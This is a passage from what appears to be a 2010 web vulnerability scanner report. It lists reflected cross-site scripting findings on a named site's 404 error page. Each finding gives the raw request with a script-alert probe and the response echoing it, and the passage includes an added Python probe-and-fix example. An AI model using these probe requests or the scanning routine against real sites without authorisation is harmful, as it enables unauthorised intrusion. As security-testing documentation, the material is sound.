<p>The requested URL /adult/media-chat/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&ba9cc<script>alert(1)</script>31bb10db194=1 was not found on this server.</p>
...[SNIP]...

2.119. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 64da7<a>8f5e48ec351 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=264da7<a>8f5e48ec351 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=264da7<a>8f5e48ec351 was not found on this server.</p>
...[SNIP]...
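
The findings from 2.106 through 2.119 share one sink: the 404 page copies the requested URL, path segments and query string included, into a <p> element without HTML-encoding it, so every path segment and any query-parameter name reflects. The Python below is an added example, not code from this scan report, from Burp, or from the target site. It reproduces the scanner's test (a marker-wrapped probe appended to the Nth path segment or used as a parameter name, then looked for in the response body) and the two-tier verdict this report uses (Certain when the <script> probe echoes unmodified, Firm when only a harmless <a> does), running it against constructed stand-ins for the 404 handler. vulnerable_404, vulnerable_404_decoding, filtered_404 and hardened_404 are assumptions that model the observed behaviour, the percent-decoding question raised above, a naive blacklist, and the fix; none of them is resellerbase.com's code, and nothing here contacts the site.

```python
"""Reflection check for a 404 page that echoes the request URI.

Added example, not code from the scan report or the target application.
The 404 handlers are constructed stand-ins for the behaviour seen in the
responses above (requested URL copied into a <p>); hardened_404 is the fix.
"""
import html
from typing import Callable
from urllib.parse import quote, unquote

SCRIPT_PROBE = "<script>alert(1)</script>"   # the scanner's JavaScript PoC
TAG_PROBE = "<a>"                            # harmless-tag fallback


def make_payload(probe: str, left: str = "69d9e", right: str = "04b72d9a9bd") -> str:
    """Wrap a probe in marker strings so its echo can be located exactly.
    Fixed defaults mirror the report's markers; use fresh random hex
    (e.g. secrets.token_hex) against a live target."""
    return f"{left}{probe}{right}"


def inject_rest_param(path: str, index: int, payload: str) -> str:
    """Append payload to path segment `index` (1-based): the report's
    'REST URL parameter N' (N=6 on .../rating/4half.gif hits 'rating')."""
    segments = path.split("/")          # segments[0] is "" for the leading slash
    if not 1 <= index < len(segments) or segments[index] == "":
        raise ValueError(f"{path!r} has no REST URL parameter {index}")
    segments[index] += payload
    return "/".join(segments)


def inject_param_name(target: str, payload: str) -> str:
    """Add a query parameter whose *name* is the payload (?payload=1)."""
    sep = "&" if "?" in target else "?"
    return f"{target}{sep}{payload}=1"


def vulnerable_404(request_target: str) -> str:
    """Constructed: the raw request URI lands between tags, as observed above."""
    return ("<title>Error 404 - Page Not Found</title>"
            f"<p>The requested URL {request_target} was not found on this server.</p>")


def vulnerable_404_decoding(request_target: str) -> str:
    """Constructed: same sink, but the URI is percent-decoded before the echo."""
    return vulnerable_404(unquote(request_target))


def filtered_404(request_target: str) -> str:
    """Constructed: a naive blacklist that strips '<script' and nothing else."""
    return vulnerable_404(request_target.replace("</script", "").replace("<script", ""))


def hardened_404(request_target: str) -> str:
    """Fix: HTML-encode the URI before it is placed in element content."""
    return ("<title>Error 404 - Page Not Found</title>"
            f"<p>The requested URL {html.escape(request_target, quote=True)} "
            "was not found on this server.</p>")


def classify_echo(body: str, payload: str) -> str:
    """'unmodified' if the payload appears verbatim, 'encoded' if only its
    HTML-escaped form does, otherwise 'absent'."""
    if payload in body:
        return "unmodified"
    if html.escape(payload, quote=True) in body:
        return "encoded"
    return "absent"


def probe(handler: Callable[[str], str], inject: Callable[[str], str],
          browser_encoded: bool = False) -> str:
    """Verdict for one injection point, as this report grades them:
    'Certain' = <script> probe echoed unmodified, 'Firm' = only the <a>
    probe echoed unmodified, 'none' = encoded or not reflected.
    `inject` maps a payload to the request target that carries it."""
    for text, verdict in ((SCRIPT_PROBE, "Certain"), (TAG_PROBE, "Firm")):
        payload = make_payload(text)
        target = inject(payload)
        if browser_encoded:
            # Browsers percent-encode < and > in the request line; the raw
            # scanner requests above do not, so check this form as well.
            target = quote(target, safe="/?=&")
        if classify_echo(handler(target), payload) == "unmodified":
            return verdict
    return "none"


def scan_target(handler: Callable[[str], str], target: str, **kw) -> dict:
    """Probe every REST URL parameter plus an arbitrary query-parameter
    name: the same injection points the findings in this report list."""
    path, _, query = target.partition("?")
    query = "?" + query if query else ""
    results = {}
    for i in range(1, len([s for s in path.split("/") if s]) + 1):
        results[f"REST URL parameter {i}"] = probe(
            handler, lambda p, i=i: inject_rest_param(path, i, p) + query, **kw)
    results["name of an arbitrarily supplied request parameter"] = probe(
        handler, lambda p: inject_param_name(target, p), **kw)
    return results
```

Against a live target, replace the handler with a function that sends the request target and returns the response body, and pass fresh random markers to make_payload. Running scan_target with browser_encoded=True is the check worth doing before calling the path-segment findings exploitable from a link: on the raw-echo stand-in it reports nothing, on the decoding stand-in it reports Certain, and which of the two a real handler resembles is exactly what the requests in this report do not show.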

2.120. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 477e0<script>alert(1)</script>2a30a9b57c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult477e0<script>alert(1)</script>2a30a9b57c6/media-chat/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult477e0<script>alert(1)</script>2a30a9b57c6/media-chat/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.121. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 75d34<script>alert(1)</script>17c5768d51d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat75d34<script>alert(1)</script>17c5768d51d/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat75d34<script>alert(1)</script>17c5768d51d/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.122. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f709a<script>alert(1)</script>77311ebc0d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themesf709a<script>alert(1)</script>77311ebc0d/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themesf709a<script>alert(1)</script>77311ebc0d/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.123. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a84f8<script>alert(1)</script>00355eba268 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmosa84f8<script>alert(1)</script>00355eba268/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmosa84f8<script>alert(1)</script>00355eba268/images/review/ was not found on this server.</p>
...[SNIP]...

2.124. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e638d<script>alert(1)</script>896fd05865e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/imagese638d<script>alert(1)</script>896fd05865e/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/imagese638d<script>alert(1)</script>896fd05865e/review/ was not found on this server.</p>
...[SNIP]...

2.125. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 2c60d<script>alert(1)</script>8d5169858d9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/review2c60d<script>alert(1)</script>8d5169858d9/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/review2c60d<script>alert(1)</script>8d5169858d9/ was not found on this server.</p>
...[SNIP]...

2.126. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cc665<script>alert(1)</script>1cdcebf9fe0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/review/?cc665<script>alert(1)</script>1cdcebf9fe0=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/review/?cc665<script>alert(1)</script>1cdcebf9fe0=1 was not found on this server.</p>
...[SNIP]...

2.127. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 16f69<script>alert(1)</script>cd14d45c177 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult16f69<script>alert(1)</script>cd14d45c177/media-chat/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult16f69<script>alert(1)</script>cd14d45c177/media-chat/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.128. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e118e<script>alert(1)</script>7340aa36434 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chate118e<script>alert(1)</script>7340aa36434/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chate118e<script>alert(1)</script>7340aa36434/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.129. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3c916<script>alert(1)</script>4d1362646c6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes3c916<script>alert(1)</script>4d1362646c6/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes3c916<script>alert(1)</script>4d1362646c6/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.130. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8ccf2<script>alert(1)</script>6e8b33ca8fb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos8ccf2<script>alert(1)</script>6e8b33ca8fb/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos8ccf2<script>alert(1)</script>6e8b33ca8fb/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.131. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 31b69<script>alert(1)</script>dea8921a1a2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images31b69<script>alert(1)</script>dea8921a1a2/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images31b69<script>alert(1)</script>dea8921a1a2/review/0.gif was not found on this server.</p>
...[SNIP]...

2.132. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 9b4f6<script>alert(1)</script>8f41ec5e8ab was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/review9b4f6<script>alert(1)</script>8f41ec5e8ab/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/review9b4f6<script>alert(1)</script>8f41ec5e8ab/0.gif was not found on this server.</p>
...[SNIP]...

2.133. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload c835c<script>alert(1)</script>7d0c5f7975 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/review/0.gifc835c<script>alert(1)</script>7d0c5f7975 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/review/0.gifc835c<script>alert(1)</script>7d0c5f7975 was not found on this server.</p>
...[SNIP]...

2.134. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/review/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9f3b4<script>alert(1)</script>1e3a466aa67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/review/0.gif?9f3b4<script>alert(1)</script>1e3a466aa67=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/review/0.gif?9f3b4<script>alert(1)</script>1e3a466aa67=1 was not found on this server.</p>
...[SNIP]...

2.135. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8e6bd<script>alert(1)</script>e770d40c3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

